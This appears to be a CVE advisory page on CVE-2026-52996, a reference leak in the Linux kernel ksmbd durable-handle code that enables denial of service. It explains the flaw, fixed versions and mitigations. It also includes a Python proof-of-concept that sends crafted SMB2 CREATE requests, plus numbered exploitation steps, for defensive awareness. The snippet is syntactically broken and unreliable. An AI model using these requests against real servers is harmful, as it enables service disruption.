Linux Kernel, Resource Leak, CVE-2026-52996 (Critical) -DC-Jul2026-1010

Listen to this Post

How CVE-2026-52996 Works

The Linux kernel’s ksmbd (SMB/CIFS server) component implements durable handles – a feature that allows clients to reconnect and resume operations after a network disruption. When a client requests a durable handle via the `SMB2_CREATE_DURABLE_HANDLE_REQUEST_V2` context, the server must locate an existing open file whose `CreateGuid` matches the request and whose `ClientGUID` matches the connection’s ClientGuid (per MS-SMB2 section 3.3.5.9.10).
The vulnerable code path begins in ksmbd_lookup_fd_cguid(), which searches the global file table (global_ft) for an entry matching the provided CreateGuid. If found, this function returns a `ksmbd_file` structure with its reference count already incremented via ksmbd_fp_get(). The caller, parse_durable_handle_context(), then inspects the returned file.
In the correct flow – when both `CreateGuid` and `ClientGUID` match – the function properly releases the reference either by calling `ksmbd_put_durable_fd()` or by transferring ownership to `dh_info->fp` for a successful reconnect.
However, a logic flaw exists when the `CreateGuid` matches an existing entry but the `ClientGUID` does not match. In this scenario, the code treats the situation as “Open not found” and falls through to the normal new‑open execution path. Critically, it does not release the reference obtained from ksmbd_lookup_fd_cguid(). This reference is left dangling, pinning the `global_ft` entry and preventing the durable scavenger from ever cleaning it up.
An attacker can repeatedly send crafted durable v2 open requests with a known `CreateGuid` (from a previous legitimate open) but a spoofed ClientGUID. Each such request will leak one file descriptor reference. Over time, this exhausts kernel memory, degrades performance, and ultimately leads to a denial‑of‑service condition where the system can no longer allocate new file handles. The leaked entries also prevent `__ksmbd_close_fd()` from executing, so the corresponding files remain open indefinitely.
The fix, already merged in mainline, adds a `ksmbd_put_durable_fd(dh_info->fp)` call in the mismatch branch and clears `dh_info->fp` to NULL, ensuring the reference is correctly dropped and subsequent logic does not mistake the non‑matching lookup result for a valid reconnect target.

DailyCVE Form:

Platform: Linux Kernel
Version: up to 7.0.9
Vulnerability: Resource Leak
Severity: Critical
Date: 2026-06-24

Prediction: Already patched in 7.1

What Undercode Say: Analytics

The following bash commands and code snippets can be used to inspect kernel versions, test for the vulnerability, or simulate the attack pattern.

Check your kernel version:

uname -r

Verify if the fix is present (search for the commit hash in your kernel source):

git log --oneline | grep -E "407b6e699ba8|f31beef633fb|06f709d0e531|8c4a0ef19c82"

Simple Python script to send a malformed SMB2 CREATE request with durable v2 context (proof‑of‑concept snippet):

import socket
from smbprotocol.connection import Connection
from smbprotocol.session import Session
from smbprotocol.tree import TreeConnect
from smbprotocol.create import CreateRequest, CreateContext, CreateContextValue, SMB2_CREATE_DURABLE_HANDLE_REQUEST_V2
Connect to target
conn = Connection("192.168.1.100", 445)
conn.connect()
session = Session(conn, username="user", password="pass")
session.connect()
tree = TreeConnect(session, "\\192.168.1.100\share")
tree.connect()
Craft durable v2 request with known CreateGuid but mismatched ClientGUID
create = CreateRequest()
create.file_name = "test.txt"
create.create_contexts = [
CreateContext(
context_type=SMB2_CREATE_DURABLE_HANDLE_REQUEST_V2,
data=CreateContextValue(
create_guid=b"\x11"16, Known GUID from previous open
client_guid=b"\x22"16 Mismatched ClientGUID
)
)
]
Send request - this will leak a reference on vulnerable kernels
response = tree.create(create)

Monitor for leaked file descriptors (global_ft growth):

Check ksmbd debug counters (if available)
cat /proc/fs/ksmbd/status | grep -i "open files"
Or track system-wide file descriptors
lsof | grep ksmbd | wc -l

Exploit

An attacker with network access to an SMB server running a vulnerable Linux kernel can exploit this flaw by:
1. Establishing a legitimate durable v2 open to obtain a valid CreateGuid.
2. Sending numerous subsequent CREATE requests with the same `CreateGuid` but a different `ClientGUID` (e.g., random or spoofed).
3. Each such request will cause a reference leak in the kernel’s global_ft, pinning file entries indefinitely.
4. Repeated exploitation exhausts kernel memory and file handle resources, leading to denial of service (system hangs, inability to open new files, or ksmbd crashes).
No special privileges are required beyond the ability to connect to the SMB share. The attack is local to the network segment (no Internet exposure required) and can be automated with simple scripts.

Protection

  • Upgrade the kernel to a fixed version:
  • 6.6.141 or later
  • 6.12.91 or later
  • 6.18.33 or later
  • 7.0.10 or later
  • 7.1 or later
  • Apply the patch manually if a backport is available for your distribution.
  • Disable ksmbd if SMB server functionality is not required:
    sudo systemctl stop ksmbd
    sudo systemctl disable ksmbd
    
  • Restrict network access to the SMB port (445) using firewall rules to limit exposure to trusted clients only.
  • Monitor system logs and file descriptor usage for unusual spikes.

Impact

  • Resource Exhaustion: Each malformed request leaks one `ksmbd_file` reference, preventing garbage collection and gradually consuming kernel memory.
  • Denial of Service: Prolonged exploitation renders the system unable to allocate new file handles, causing legitimate SMB operations to fail and potentially freezing the ksmbd service.
  • Defeated Durable Scavenger: The internal cleanup mechanism (__ksmbd_close_fd()) never runs for leaked entries, so the leak persists until a system reboot.
  • No Data Loss or Code Execution: The vulnerability is limited to memory/resource exhaustion and does not allow arbitrary code execution or privilege escalation.
  • CVSS Score: While NVD has not yet assigned a score, third‑party sources rate this as Critical due to the ease of exploitation and the potential for long‑term service disruption.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top